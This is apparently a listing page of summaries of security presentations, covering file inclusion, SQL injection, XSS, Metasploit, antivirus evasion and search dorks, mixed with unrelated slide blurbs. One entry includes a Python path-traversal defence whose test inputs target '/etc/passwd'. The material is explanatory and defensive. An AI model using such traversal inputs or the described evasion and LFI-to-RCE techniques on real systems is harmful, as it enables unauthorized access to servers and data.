This document provides instructions for exploiting various web application vulnerabilities, including remote file inclusion (RFI), local file inclusion (LFI), SQL injection, and more. It begins by explaining RFI and how to exploit it, including using a null byte bypass. It then covers LFI and how to escalate it to remote code execution (RCE). Other sections discuss uploading shells via LFI and Firefox, exploiting vulnerabilities to download local files, full path disclosure, SQL injection techniques, and automatically uploading a shell via a phpThumb() command injection vulnerability. The document aims to serve as a tutorial for hackers to learn various web hacking methods.
This document discusses vulnerability assessment and penetration testing. It defines them as two types of vulnerability testing that search for known vulnerabilities and attempt to exploit vulnerabilities, respectively. Vulnerability assessment uses automated tools to detect known issues, while penetration testing employs hacking techniques to demonstrate how deeply vulnerabilities could be exploited like an actual attacker. Both are important security practices for identifying weaknesses and reducing risks, but require different skills and have different strengths, weaknesses, frequencies, and report outputs. Reasons for vulnerabilities include insecure coding, limited testing, and misconfigurations. The document outlines common vulnerability and attack types as well as how vulnerability assessment and penetration testing are typically conducted.
The document is a presentation on threat hunting with Splunk. It discusses threat hunting basics, data sources for threat hunting, knowing your endpoint, and using the cyber kill chain framework. It outlines an agenda that includes a hands-on walkthrough of an attack scenario using Splunk's core capabilities. It also discusses advanced threat hunting techniques and tools, enterprise security walkthroughs, and applying machine learning and data science to security.
This presentation describes penetration testing using a Who, What, Where, When, and How approach. It shows the common pitfalls of a bad penetration test and how to identify a better one, so that you can recognize and differentiate the two by looking at both the methods (attitude) and the results.
An XSS attack is a type of vulnerability that allows malicious scripts to be injected into web pages viewed by other users. There are three main types: reflected XSS occurs when a link containing malicious code is clicked; stored XSS injects code directly into a vulnerable website, potentially affecting many users; DOM-based XSS involves injecting code into a website hosted on a user's local system, allowing the attacker to access that user's browser privileges. The document provides examples of how XSS attacks work and can be used to hijack accounts, insert hostile content, steal cookies, and redirect users.
These slides guide you through the tools and techniques one can use for footprinting websites or people. You will find amazing tools and techniques; have a look.
Slides for a college course in "Advanced Ethical Hacking" at CCSF. Instructor: Sam Bowne
Course Web page:
https://samsclass.info/124/124_F17.shtml
Based on "Penetration Testing: A Hands-On Introduction to Hacking" by Georgia Weidman -- ISBN-10: 1593275641, No Starch Press; 1 edition (June 8, 2014)
This 1-day course introduces network penetration testing concepts and provides an overview of the penetration testing process. It covers prerequisites, objectives, benefits, definitions, types of penetration testing and phases including reconnaissance, scanning, exploitation, and reporting. The goal is to prepare students to understand and assist with penetration tests, though they will not be able to independently conduct professional tests after this introductory course.
Understand AWS best practices for Distributed Denial of Service (DDoS) resiliency and how AWS Shield can help you protect your business. Uncover how this service safeguards web applications running on AWS, and how always-on detection and automatic inline mitigations minimize application downtime and latency.
This document summarizes a presentation about penetration testing with Metasploit. It introduces penetration testing and why organizations use it. It then discusses the basics of Metasploit, including interfaces like MSFconsole. Key concepts in Metasploit like exploits, payloads, and Meterpreter are explained. The presentation demonstrates Metasploit against different operating systems like Windows XP, Windows 7, and Ubuntu. It shows how to find and use appropriate exploits and payloads to gain remote access and post-exploitation activities.
The document discusses penetration testing and related security concepts. It covers topics like vulnerability assessment, security audits, the differences between penetration testing and other assessments, common penetration testing methodologies, and the standard phases of information gathering, network mapping, vulnerability identification, exploitation, privilege escalation, maintaining access and covering tracks.
A military concept now applied to cybersecurity, the "cyber kill chain" was developed by Lockheed Martin in 2011. It describes the phases an adversary will follow to target an organization. There are 7 well-defined phases, and the attack is considered successful if/when all phases have been carried out.
(DOCUMENT IN ENGLISH)
Web application attacks can take many forms, including cross-site scripting (XSS), SQL injection, parameter tampering, command injection, session management issues, cookie poisoning, directory traversal, cross-site request forgery, and buffer overflows. XSS is a vulnerability that allows malicious JavaScript code to be injected and run in a user's browser, potentially accessing data. SQL injection involves inserting SQL commands into a database query to gain unauthorized access. Parameter tampering modifies URL parameters to change expected behavior.
This document provides an overview of scanning techniques used in ethical hacking. It defines scanning as gathering information about IP addresses, operating systems, services, and architectures of target systems. The document outlines common scanning types like port scanning, network scanning, and vulnerability scanning. It also describes popular scanning tools like Nmap and Hping2, and scanning methods like ping sweeps, SYN stealth scans, and Xmas scans. The goal of scanning is to detect live systems, open ports, operating systems, and services to inform later stages of hacking like banner grabbing, vulnerability assessment, and network mapping.
Cross Site Scripting (XSS) is a vulnerability that allows malicious users to insert client-side code into web pages that is then executed by a user's browser. This code can steal cookies, access private information, perform actions on the user's behalf, and redirect them to malicious websites. XSS works by having the server display input containing malicious JavaScript from a request. There are different types of XSS attacks, including non-persistent, persistent, and DOM-based attacks. Prevention methods include validating, sanitizing, and escaping all user input on the server-side and client-side. Web vulnerability scanners like Burp Suite can help test for XSS and other vulnerabilities.
Hunting Lateral Movement in Windows Infrastructure
The document discusses various techniques attackers can use to launch executables remotely on Windows systems by leveraging compromised credentials and built-in OS functionality. It describes how to detect remotely launched executables using Windows Event and Sysmon logs. Specific techniques covered include remote file copy over SMB, remote execution via WMI, WinRM, PowerShell Remoting, scheduled tasks, services, the registry, and WMI subscriptions. The document provides the event sequences and the most interesting events to look for when hunting for evidence of each technique.
This document discusses techniques for evading antivirus and firewalls, including generating executable files with embedded PowerShell commands to execute backdoors, generating macro-enabled Excel files with encoded payloads to act as Trojans, and using the Shellter tool to dynamically inject shellcode into Windows applications. Figures are provided showing the use of tools like Metasploit and Unicorn to generate payloads and backdoors, embedding them in files, bypassing antivirus detection, and attackers gaining sessions on victim machines.
Google dorks are search operators used to refine Google searches. They can be used to access secure webpages, download files, or access security cameras. Common dorks include "site:", "inurl:", "intitle:", and "filetype:" or "ext:". SQL injection is a code injection technique that exploits security vulnerabilities in database applications. It works by inserting SQL commands into user input fields to alter the meaning of SQL queries and gain unauthorized access to databases. Defenses include input validation, prepared statements, limiting privileges, and intrusion detection systems.
The document contains PHP code for a website that displays and searches product information from a database. It includes:
1. Code to connect to a MySQL database and select the "banhang" database.
2. Index code that includes header, sidebar, content, and footer files. Content displays products and handles search/detail page links.
3. Product display code that queries the database and loops through results to show images, prices and links.
4. Category, search, and detail inclusion files that query the database to populate dropdowns, search results, and detailed product pages.
The document discusses assistive technology (AT) as defined by IDEA 2004 and various examples of AT. It notes that IDEA 2004 requires IEP teams to consider AT needs for students with disabilities and that schools must provide AT and training. Several types of AT are then described, including personal amplifiers for hearing loss which reduce background noise, CCTVs for visual impairments to magnify print, talking calculators for learning disabilities in math, and page turners for physical disabilities.
This document contains a list of over 150 potential SQL injection dorks targeting parameters with "id=" in the URL. The dorks target content management systems and databases on websites. It also contains generic dorks searching for SQL warning messages.
The document discusses content sniffing vulnerabilities in web browsers. It explains that browsers try to determine the true content type of a file, even if the server provides the wrong content type header. This allows an attacker to craft a file, like an image, that is also valid HTML containing JavaScript. When the browser content sniffs the file and treats it as HTML, the JavaScript will execute in the context of the vulnerable website. The document provides examples of how this can be used to steal cookies from users and perform cross-site scripting attacks. It recommends server and browser fixes like ensuring correct content type headers and adding headers to disable content sniffing.
Artificial intelligence (AI) is the interdisciplinary study of how to create intelligent systems, like human intelligence. AI is defined as a machine's capacity to reason and spans fields such as computer science, mathematics and philosophy. Although machines cannot think like humans, AI has allowed them to simulate complex processes, though with limitations and the risk of possible negative consequences if they get out of control.
The document outlines details about the Certified Ethical Hacker (CEH) certification course. The 5-day, 8 hours per day course covers topics like footprinting, reconnaissance, scanning networks, system hacking, social engineering, and cryptography. Successful students will receive the CEH certification from EC-Council after passing the online exam on the last day of training. Contact information is provided for inquiries.
This document discusses electronic voting machines (EVMs) in India and whether they can be hacked. It begins by describing what an EVM is and how it works. It then addresses whether EVMs can be hacked, explaining that while direct hacking is not possible, tampering with hardware is. The document outlines two attacks involving replacing EVM parts or using devices to change stored vote records. It notes that current safeguards are inadequate and that the lack of transparency in the EVM system means problems cannot be easily fixed. Frequently asked questions and sources are provided at the end.
This document provides instructions for making various configuration changes and restrictions in the Windows registry related to system, networking, and application settings. It includes over 50 entries organized by topic that describe how to modify registry keys and values to disable features, restrict access, and modify default behaviors. Examples include disabling the right click context menu, hiding drives, locking file associations, and restricting changes to the start menu and control panel options.
Google dorks, also known as Google hacking, involves using specific search operators and techniques on Google to find sensitive information on websites. Some key points made in the document include:
- Google dorking uses operators like "site:", "filetype:", "intitle:", and "inurl:" to refine search results and maximize search value. This can be used to uncover private information, configurations, backups, and vulnerabilities.
- Information found through Google hacking may remain exposed in Google's cache for months after being removed from websites.
- Google indexes everything publicly available on the internet, making it a powerful tool for passive information gathering, which is an important first step for hackers.
- The document encourages
This document contains notes on networking concepts including network requirements, communication media, networking devices, Ethernet cabling, OSI model, TCP/IP protocols, IP addressing, and classes of networks. It defines networking as the method of establishing a connection between two or more computers for data communication and sharing resources. Basic requirements for establishing a network include networking cards and communication media such as wired (coaxial cable, fiber optics, twisted pair) and wireless. Common networking devices are hubs, switches, routers, and bridges.
This document provides an overview of Metasploit for beginners. It discusses why Metasploit is useful, how to set up a demo environment, and how to use auxiliary and exploit modules. It then demonstrates auxiliary modules for scanning and information gathering. It also demonstrates two exploit modules against ElasticSearch and Jenkins, using reverse shell payloads. The document provides a cheat sheet for navigating msfconsole and describes common commands used prior to demonstrations.
The document contains a list of search strings that can be used to find potential vulnerabilities on websites and web applications. Some of the search strings look for pages indicating login portals for administrative access, content management systems, and other common internet-facing applications. Other search strings try to identify specific applications or technologies like vBulletin, ColdFusion, and iSecure. The overall document appears to be sharing ways to search for unprotected administrative or backend interfaces online.
Thwarting The Surveillance in Online Communication by Adhokshaj Mishra
This document discusses techniques for countering online surveillance and protecting private communications. It begins by outlining common surveillance methods used by governments and companies, such as wiretapping and exploiting software vulnerabilities. It then discusses using cryptography to counter surveillance and keep data safe, such as encrypting files and filling volumes with cryptographically secure random data. Secure authentication techniques are presented that allow verifying credentials without revealing passwords. Finally, the document details a method for encrypting and authenticating private messages between two parties using Diffie-Hellman key exchange and digital signatures to provide encryption, authentication, deniability and perfect forward secrecy.
This document discusses common web application vulnerabilities and methods for preventing hacking. It covers code injection attacks using C99 shell, file inclusion vulnerabilities through remote and local file access, dictionary attacks, SQL injections, cross-site scripting (XSS), clickjacking, dynamic code evaluation, and countermeasures like input validation, output encoding, prepared statements, and avoiding dangerous functions. The goal is to explain how applications are hacked and defensive coding practices to prevent attacks.
This document discusses various vulnerabilities in PHP coding practices and provides examples of how each vulnerability can be exploited as well as how to fix them. It covers remote file inclusion, local file inclusion, local file disclosure, SQL injection, remote command execution, remote code execution, cross-site scripting, authentication bypass, and cross-site request forgery vulnerabilities. For each vulnerability, it provides a basic PHP code example to demonstrate the issue, how an attacker could exploit it, and recommendations on how to fix the vulnerable code, such as sanitizing user inputs, using prepared statements, and implementing authentication systems. The goal is to help PHP developers write more secure code and avoid common vulnerabilities.
This document discusses journeying from local file inclusion (LFI) vulnerabilities to remote code execution (RCE). It begins with an introduction and overview. It then covers LFI in detail, explaining how to find and exploit LFI vulnerabilities using directory traversal to read files. Next, it discusses remote file inclusion (RFI) and how it can lead to code execution. Prevention methods are outlined. Finally, it demonstrates exploiting LFI and RFI on a test server, verifying with phpinfo() and ping, before obtaining a reverse shell through a GET request. Common log locations are also listed.
This document summarizes techniques for exploiting local file inclusion (LFI) vulnerabilities to achieve remote command execution (RCE). It begins by explaining LFI and how it can be used to read local files. It then describes how LFI can be used to inject code into log files or environment variables to execute commands remotely. The document provides an introduction to using Perl sockets and libraries for creating HTTP requests, and gives an example Perl exploit script that uses log file injection to execute code via LFI. It concludes with recommendations for preventing LFI vulnerabilities.
This document discusses secure file upload in PHP web applications. It begins by describing a naive file upload implementation that allows arbitrary files to be uploaded, including PHP scripts that could execute commands on the server. It then discusses various approaches to make file uploads more secure, such as verifying the content type, image file contents, and file extensions. However, it notes that an attacker can bypass these checks by manipulating the HTTP request. The document concludes by providing a reference implementation for a more secure file upload process.
Table of Contents
The OWASP Top Ten
Unvalidated Redirects and Forwards
Security Misconfiguration
Application Fingerprint
Error handling And Logging
Noise
PHP Guidelines
Web application security is an important topic gaining more attention. Sensitive data needs protection not only on servers but also when traveling over networks. Common web application vulnerabilities include cross-site scripting, SQL injection, and cross-site request forgery. Developers should implement measures like encryption, limiting file access and uploads, hiding errors, and using secure sessions to authenticate users. Security requires ongoing consideration to prevent network attacks, unauthorized access, and data theft.
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
The document discusses remote file inclusion (RFI) and local file inclusion (LFI) attacks and defenses. It provides examples of vulnerable code that allows RFI/LFI exploits by directly using unsanitized user input. It then demonstrates how to conduct RFI/LFI attacks to view files or execute commands on the server. Finally, it recommends sanitizing user input with functions like strip_tags(), htmlspecialchars(), and providing one's own cleaning function to prevent RFI/LFI exploits.
Local File Inclusion (LFI) vulnerabilities allow an attacker to include files from a web server by manipulating input that is used to include files. For example, a script that includes files based on a page parameter, like script.php?page=index.html, could be exploited by changing the page parameter to try and include files like ../../../../etc/passwd. Successful exploitation can reveal sensitive information like the server's password file. LFI vulnerabilities are common and can often be exploited through PHP wrappers like php://input or php://filter to include files or execute system commands on the server.
Short presentation on techniques for protecting against vulnerabilities in commonly available PHP packages using a combination of Apache + FastCGI + suEXEC + chroot + mod_security2
The document discusses various LAMP security practices such as preventing XSS attacks by sanitizing user input, using prepared statements to prevent SQL injection, disabling unnecessary modules and server information, limiting file uploads and access to the file system, and write protecting configuration files. It provides examples of code and configuration settings to implement these practices.
Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
The document discusses finding vulnerabilities in Flash applications through runtime analysis. It describes how uninitialized variables, external files, and dangerous native functions can be entry points for attacks. It then provides a recipe for analyzing a SWF at runtime to detect vulnerabilities, including using an analyzer framework that loads the SWF and implements resolution methods to detect undefined variables and inject attack patterns.
The document provides instructions for installing and setting up the Symfony PHP framework. It discusses different installation methods like using the sandbox, PEAR, or SVN. It also covers generating a new Symfony project and application, configuring the web server, and troubleshooting common issues. Version control of Symfony projects using Subversion is also described.
The document provides an overview of the Lumen micro-framework by Laravel. It discusses Lumen's system requirements, how to install Lumen using Composer or the Lumen installer, configuring pretty URLs, the directory structure, HTTP routing, middleware, controllers, and views. Additional features covered include caching, databases, encryption, errors and logging, events, queues, testing, and more full-stack features like authentication and mail.
This document provides an overview of the Phalcon PHP framework. It discusses why frameworks are important for PHP development and how traditional frameworks work. It then explains how Phalcon is different as it is implemented as a PHP extension written in C, making it faster than traditional frameworks. The document demonstrates how to install Phalcon, create a basic project structure, define controllers and models, and connect to a database.
The document provides guidance on releasing open source projects. It discusses security, hosting, managing source code, package management, design patterns, testing, and resources. The key recommendations are to focus on security, use GitHub for hosting, manage versions with SemVer, use Composer for dependencies, implement common design patterns, write unit tests with at least 80% coverage, and wrap resources to allow for mocking in tests.
This document summarizes a Drupal hack that occurred at the University of Toronto Libraries. The hack was detected by analyzing Apache logs and noticing odd traffic patterns, including many wp-conf requests. The hack exploited an FCKEditor bug and the PHP Filter module to inject malicious code that could execute PHP. This allowed the hacker to access files, databases, and user information. To recover, the organization restored from backups, disabled vulnerable modules, reset passwords, and improved security practices like access controls and updates. Lessons included following security guidelines, testing updates, using HTTPS, and establishing security processes and failure rehearsals.
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
During the session we will go through different methods of exploiting file upload pages in order to trigger Remote Code Execution, SQL Injection, Directory Traversal, DOS, Cross Site Scripting and other web application vulnerabilities, with demo code. Also, we will see things from both the developers' and the attackers' side: what protections developers apply to mitigate file upload issues by validating the file name, file Content-Type and actual file content, and how to bypass them all using 15 techniques!
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
The document discusses setting up continuous integration using Hudson. It explains that Hudson automates build and deployment processes, provides instant feedback, and helps keep teams honest about tests. Setup involves installing Java, Hudson, and configuring a sample project in Hudson to build from a Git repository on each commit.
The document discusses search operators for Yandex, a Russian search engine. It provides examples of over 20 different Yandex boolean operators like +, -, &&, ||, and others. It explains what each operator does and provides examples of queries using the various operators to refine searches on Yandex. The boolean operators allow users to search for exact phrases, exclude terms, define word proximity, search specific fields, and more.
This document discusses social media intelligence and Twitter advanced search capabilities. It introduces Twitter, explaining that it is a microblogging platform and the 8th most popular website globally. The document also outlines different advanced search operators for Twitter including searching by words, phrases, hashtags, accounts, locations, dates, and tweet properties like whether they are positive, negative, questions, or retweets. It notes that advanced search allows more precise searching than basic search to collect social mentions for social media intelligence purposes.
Recon-ng is a Python-based web reconnaissance framework that allows automated reconnaissance. It focuses on open-source intelligence gathering from web-based sources. The tool downloads from Bitbucket and has usage guides there. Recon-ng demonstrations show searching reverse domains, using the Builtwith and Punkspider modules to gather technical information, and using the LinkedIn module to find people at a specific company.
This document provides an overview of the open source intelligence (OSINT) tool Maltego. It describes what Maltego is, how it works, and how to install it. Maltego allows users to map relationships between entities like people, organizations, websites, domains, and IP addresses through the use of transforms. It gathers information from online sources and users can write their own transforms and machines. The document provides details on features of Maltego and how to download the commercial or community editions.
This document discusses search and advanced search features on LinkedIn. It introduces LinkedIn as a professional networking site and explains why it is useful for social media intelligence. It then describes LinkedIn's advanced search page and the various filters that can be used to refine searches, such as keywords, name, title, location, relationship filters, current/past companies, school, languages, interests, and premium member filters. Finally, it explains how Boolean operators like AND, OR, NOT, parentheses, and quotation marks can be used to perform more complex searches on LinkedIn.
The document discusses social media intelligence (SOCMINT) and how to use Facebook's graph search and search functions to find information about people. It provides examples of different types of queries that can be used to search for people by name, age, location, school, likes, photos, posts, and more. The case study demonstrates how to use these search functions to find information about a black hat hacker named Shadow Walker.
The document discusses the different layers of the internet, including the clearweb which is accessible via search engines, the dark web which search engines don't index, and the deep web which requires special software like Tor or I2P to access. It provides an overview of Tor and I2P anonymity networks, and how to configure them to access the deep web through URLs ending in .onion rather than standard top-level domains. The document also gives an example of a hidden wiki URL that can only be accessed through the Tor browser, not a regular browser.
Ethical Hacking (CEH) - Industrial Training Report
This document is Raghav Bisht's report on his 6-week summer training at Bytec0de Securities PVT. LTD from May 25th to July 25th 2013 under the guidance of Mr. Mohit Yadav. The report provides an overview of the training organization, outlines the training objectives and course topics covered, and thanks those who supported his training experience. Key topics covered in the training included introduction to hacking and security, ethical hacking, technology aspects of IT security, hacking steps and techniques like DDoS attacks, wireless hacking, SQL injection, and penetration testing.
SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution, allowing a hacker to interfere with a database-driven application's interaction with backend databases. There are different types of SQL injections, including union-based, error-based, and blind SQL injections. Authentication can also be bypassed through SQL injection by making logical conditions like 1=1 or ""="" always true. The document provides examples of SQL injection payloads and demo websites to practice SQL injection techniques.
OS command injection vulnerabilities occur when user input is not sanitized before being passed to a shell command interpreter. This allows attackers to inject arbitrary commands that will be executed by the server, potentially compromising the server or application data. Command injection vulnerabilities are serious because they may enable attackers to use the server as a platform for launching attacks against other systems. Commix is an open source tool that can detect and exploit command injection vulnerabilities.
Introduction To Vulnerability Assessment & Penetration Testing
A vulnerability assessment identifies vulnerabilities in systems and networks to understand threats and risks. Penetration testing simulates cyber attacks to detect exploitable vulnerabilities. There are three types of penetration testing: black box with no system info; white box with full system info; and grey box with some system info. Common vulnerabilities include SQL injection, XSS, weak authentication, insecure storage, and unvalidated redirects. Tools like Nexpose, QualysGuard, and OpenVAS can automate vulnerability assessments.
Penetration testing involves evaluating systems or networks using malicious techniques to identify security vulnerabilities. It is done by exploiting vulnerabilities to gain unauthorized access to sensitive information. Common vulnerabilities arise from design errors, poor configuration, and human error. Penetration testing is conducted to secure government data transfers, protect brands, and find vulnerabilities in applications, operating systems, databases, and network equipment. Metasploit is an open-source framework used for hacking applications and operating systems that contains exploits, payloads, and modules. Msfconsole is an interface used to launch attacks and create listeners in Metasploit.
Hacking involves exploiting vulnerabilities in computer systems or networks to gain unauthorized access. There are different types of hackers, including white hat hackers who perform ethical hacking to test security, black hat hackers who perform hacking with malicious intent, and grey hat hackers who may sometimes hack ethically and sometimes not. Ethical hacking involves testing one's own systems for vulnerabilities without causing harm. Vulnerability assessments and penetration tests are common ethical hacking techniques that involve scanning for vulnerabilities and attempting to exploit them in a controlled way. Popular tools used for ethical hacking include Kali Linux, Nmap, Metasploit, and John the Ripper.
Directory traversal, also known as path traversal, allows attackers to access files and directories outside of the web server's designated root folder by supplying sequences such as `../` in a path parameter. This can lead to attacks like file inclusion, where code of the attacker's choosing is executed on the server, and source code disclosure, where sensitive application code is revealed. Local file inclusion allows attackers to include files that already exist on the web server (logs, configuration, uploaded files), while remote file inclusion includes files from external URLs, which in PHP requires `allow_url_include` to be enabled, and can give remote code execution on the vulnerable server.
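The traversal defence a practitioner wants next to this summary, as an added example that is not from the summarised document: a common broken filter (delete `../` once) beside a check that resolves the path and requires it to remain under the web root. The temporary web root and its single file are constructed for the example.

```python
import os
import tempfile


def naive_filter(path):
    """A common but broken fix: strip '../' once. It is not applied recursively,
    so '....//' collapses to '../' after the filter has run."""
    return path.replace("../", "")


def is_inside_root(root, user_path):
    """True only if the fully resolved path (symlinks and '..' applied) stays under root.
    An absolute user_path discards root in os.path.join and is rejected the same way."""
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, user_path))
    return os.path.commonpath([root, candidate]) == root


def safe_join(root, user_path):
    """Resolve a user-supplied relative path against the web root, or refuse it."""
    if not is_inside_root(root, user_path):
        raise ValueError("path escapes web root: %r" % user_path)
    return os.path.realpath(os.path.join(os.path.realpath(root), user_path))


def make_root():
    """Constructed throwaway web root containing one legitimate file."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "images", "logo.png"), "wb") as f:
        f.write(b"\x89PNG")
    return root


if __name__ == "__main__":
    root = make_root()
    print(naive_filter("....//....//etc/passwd"))          # ../../etc/passwd: filter bypassed
    print(safe_join(root, "images/logo.png"))              # resolved path under root
    for bad in ("../../etc/passwd", "/etc/passwd", naive_filter("....//....//etc/passwd")):
        print(bad, "->", is_inside_root(root, bad))         # all False
```

Checking the resolved path rather than the raw string is what makes this robust: URL-encoded, doubled or symlinked variants all end up as a concrete filesystem location, and that location is either under the root or it is not. Note that `....//....//etc/passwd` itself is harmless to the resolver (it names literal directories called `....`); it only becomes a traversal after the naive filter "cleans" it.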
This document provides an introduction to hacking and security, defining key terms. It explains that hacking involves exploiting vulnerabilities to achieve unauthorized access. Hackers are classified as white hats (ethical), black hats (crackers), or grey hats. The document outlines the importance of understanding systems to secure them through ethical hacking and penetration testing. It lists certifications in security and provides keywords and terms for hackers to be familiar with.
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
Six months into 2024, and it is clear the privacy ecosystem takes no days off!! Regulators continue to implement and enforce new regulations, businesses strive to meet requirements, and technology advances like AI have privacy professionals scratching their heads about managing risk.
What can we learn about the first six months of data privacy trends and events in 2024? How should this inform your privacy program management for the rest of the year?
Join TrustArc, Goodwin, and Snyk privacy experts as they discuss the changes we’ve seen in the first half of 2024 and gain insight into the concrete, actionable steps you can take to up-level your privacy program in the second half of the year.
This webinar will review:
- Key changes to privacy regulations in 2024
- Key themes in privacy and data governance in 2024
- How to maximize your privacy program in the second half of 2024
To help you choose the best DiskWarrior alternative, we've compiled a comparison table summarizing the features, pros, cons, and pricing of six alternatives.
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Have you noticed the OpenSSF Scorecard badges on the official Dart and Flutter repos? It's Google's way of showing that they care about security. Practices such as pinning dependencies, branch protection, required reviews, continuous integration tests etc. are measured to provide a score and accompanying badge.
You can do the same for your projects, and this presentation will show you how, with an emphasis on the unique challenges that come up when working with Dart and Flutter.
The session will provide a walkthrough of the steps involved in securing a first repository, and then what it takes to repeat that process across an organization with multiple repos. It will also look at the ongoing maintenance involved once scorecards have been implemented, and how aspects of that maintenance can be better automated to minimize toil.
If you’ve ever had to analyze a map or GPS data, chances are you’ve encountered and even worked with coordinate systems. As historical data continually updates through GPS, understanding coordinate systems is increasingly crucial. However, not everyone knows why they exist or how to effectively use them for data-driven insights.
During this webinar, you’ll learn exactly what coordinate systems are and how you can use FME to maintain and transform your data’s coordinate systems in an easy-to-digest way, accurately representing the geographical space that it exists within. During this webinar, you will have the chance to:
- Enhance Your Understanding: Gain a clear overview of what coordinate systems are and their value
- Learn Practical Applications: Why we need datums and projections, plus units between coordinate systems
- Maximize with FME: Understand how FME handles coordinate systems, including a brief summary of the 3 main reprojectors
- Custom Coordinate Systems: Learn how to work with FME and coordinate systems beyond what is natively supported
- Look Ahead: Gain insights into where FME is headed with coordinate systems in the future
Don’t miss the opportunity to improve the value you receive from your coordinate system data, ultimately allowing you to streamline your data analysis and maximize your time. See you there!
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
Your comprehensive guide to RPA in healthcare for 2024. Explore the benefits, use cases, and emerging trends of robotic process automation. Understand the challenges and prepare for the future of healthcare automation
Invited Remote Lecture to SC21
The International Conference for High Performance Computing, Networking, Storage, and Analysis
St. Louis, Missouri
November 18, 2021
YOUR RELIABLE WEB DESIGN & DEVELOPMENT TEAM — FOR LASTING SUCCESS
WPRiders is a web development company specialized in WordPress and WooCommerce websites and plugins for customers around the world. The company is headquartered in Bucharest, Romania, but our team members are located all over the world. Our customers are primarily from the US and Western Europe, but we have clients from Australia, Canada and other areas as well.
Some facts about WPRiders and why we are one of the best firms around:
More than 700 five-star reviews! You can check them here.
1500 WordPress projects delivered.
We respond 80% faster than other firms! Data provided by Freshdesk.
We’ve been in business since 2015.
We are located in 7 countries and have 22 team members.
With so many projects delivered, our team knows what works and what doesn’t when it comes to WordPress and WooCommerce.
Our team members are:
- highly experienced developers (employees & contractors with 5 -10+ years of experience),
- great designers with an eye for UX/UI with 10+ years of experience
- project managers with development background who speak both tech and non-tech
- QA specialists
- Conversion Rate Optimisation - CRO experts
They are all working together to provide you with the best possible service. We are passionate about WordPress, and we love creating custom solutions that help our clients achieve their goals.
At WPRiders, we are committed to building long-term relationships with our clients. We believe in accountability, in doing the right thing, as well as in transparency and open communication. You can read more about WPRiders on the About us page.
Blockchain technology is transforming industries and reshaping the way we conduct business, manage data, and secure transactions. Whether you're new to blockchain or looking to deepen your knowledge, our guidebook, "Blockchain for Dummies", is your ultimate resource.
7 Most Powerful Solar Storms in the History of Earth.pdf
Solar Storms (Geo Magnetic Storms) are the motion of accelerated charged particles in the solar environment with high velocities due to the coronal mass ejection (CME).
Implementations of Fused Deposition Modeling in real world
The presentation showcases the diverse real-world applications of Fused Deposition Modeling (FDM) across multiple industries:
1. **Manufacturing**: FDM is utilized in manufacturing for rapid prototyping, creating custom tools and fixtures, and producing functional end-use parts. Companies leverage its cost-effectiveness and flexibility to streamline production processes.
2. **Medical**: In the medical field, FDM is used to create patient-specific anatomical models, surgical guides, and prosthetics. Its ability to produce precise and biocompatible parts supports advancements in personalized healthcare solutions.
3. **Education**: FDM plays a crucial role in education by enabling students to learn about design and engineering through hands-on 3D printing projects. It promotes innovation and practical skill development in STEM disciplines.
4. **Science**: Researchers use FDM to prototype equipment for scientific experiments, build custom laboratory tools, and create models for visualization and testing purposes. It facilitates rapid iteration and customization in scientific endeavors.
5. **Automotive**: Automotive manufacturers employ FDM for prototyping vehicle components, tooling for assembly lines, and customized parts. It speeds up the design validation process and enhances efficiency in automotive engineering.
6. **Consumer Electronics**: FDM is utilized in consumer electronics for designing and prototyping product enclosures, casings, and internal components. It enables rapid iteration and customization to meet evolving consumer demands.
7. **Robotics**: Robotics engineers leverage FDM to prototype robot parts, create lightweight and durable components, and customize robot designs for specific applications. It supports innovation and optimization in robotic systems.
8. **Aerospace**: In aerospace, FDM is used to manufacture lightweight parts, complex geometries, and prototypes of aircraft components. It contributes to cost reduction, faster production cycles, and weight savings in aerospace engineering.
9. **Architecture**: Architects utilize FDM for creating detailed architectural models, prototypes of building components, and intricate designs. It aids in visualizing concepts, testing structural integrity, and communicating design ideas effectively.
Each industry example demonstrates how FDM enhances innovation, accelerates product development, and addresses specific challenges through advanced manufacturing capabilities.
Kief Morris rethinks the infrastructure code delivery lifecycle, advocating for a shift towards composable infrastructure systems. We should shift to designing around deployable components rather than code modules, use more useful levels of abstraction, and drive design and deployment from applications rather than bottom-up, monolithic architecture and delivery.
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
Presented at Gartner Data & Analytics, London, May 2024. BT Group has used the Neo4j Graph Database to enable impressive digital transformation programs over the last 6 years. By re-imagining their operational support systems to adopt self-serve and data-led principles they have substantially reduced the number of applications and the complexity of their operations. The result has been a substantial reduction in risk and costs while improving time to value, innovation, and process automation. Join this session to hear their story, the lessons they learned along the way and how their future innovation plans include exploring uses of EKG + Generative AI.
Transcript: Details of description part II: Describing images in practice - T...
This presentation explores the practical application of image description techniques. Familiar guidelines will be demonstrated in practice, and descriptions will be developed “live”! If you have learned a lot about the theory of image description techniques but want to feel more confident putting them into practice, this is the presentation for you. There will be useful, actionable information for everyone, whether you are working with authors, colleagues, alone, or leveraging AI as a collaborator.
Link to presentation recording and slides: https://bnctechforum.ca/sessions/details-of-description-part-ii-describing-images-in-practice/
Presented by BookNet Canada on June 25, 2024, with support from the Department of Canadian Heritage.
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
